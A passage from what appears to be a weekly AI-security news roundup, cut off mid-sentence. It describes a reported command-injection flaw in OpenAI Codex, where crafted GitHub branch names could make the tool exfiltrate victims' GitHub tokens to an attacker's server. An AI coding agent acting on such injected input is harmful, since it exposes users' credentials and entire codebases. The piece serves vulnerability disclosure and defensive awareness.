
This Week in AI Security: OpenAI Codex Hacked, LiteLLM Supply Chain Attack, Claude Gets Computer Control
This was the week AI security stopped being theoretical. Three events, all within days of each other, paint a picture that every developer building with AI tools needs to understand. 1. OpenAI Codex: Command Injection via Branch Names BeyondTrust's Phantom Labs team (Tyler Jespersen) found a critical vulnerability in OpenAI Codex affecting all Codex users . The attack: command injection through GitHub branch names in task creation requests. An attacker could craft a malicious branch name that, when processed by Codex, would exfiltrate a victim's GitHub tokens to an attacker-controlled server. The impact: full read/write access to a victim's entire codebase. Lateral movement across repositories. Everything. OpenAI patched it quickly. But the pattern is what matters: AI coding tools inherit trust from user context (GitHub tokens, env vars, API keys) but don't treat that context as a security boundary. Every AI coding tool that touches git has this same attack surface. Basically nobody is
Continue reading on Dev.to
Opens in a new tab



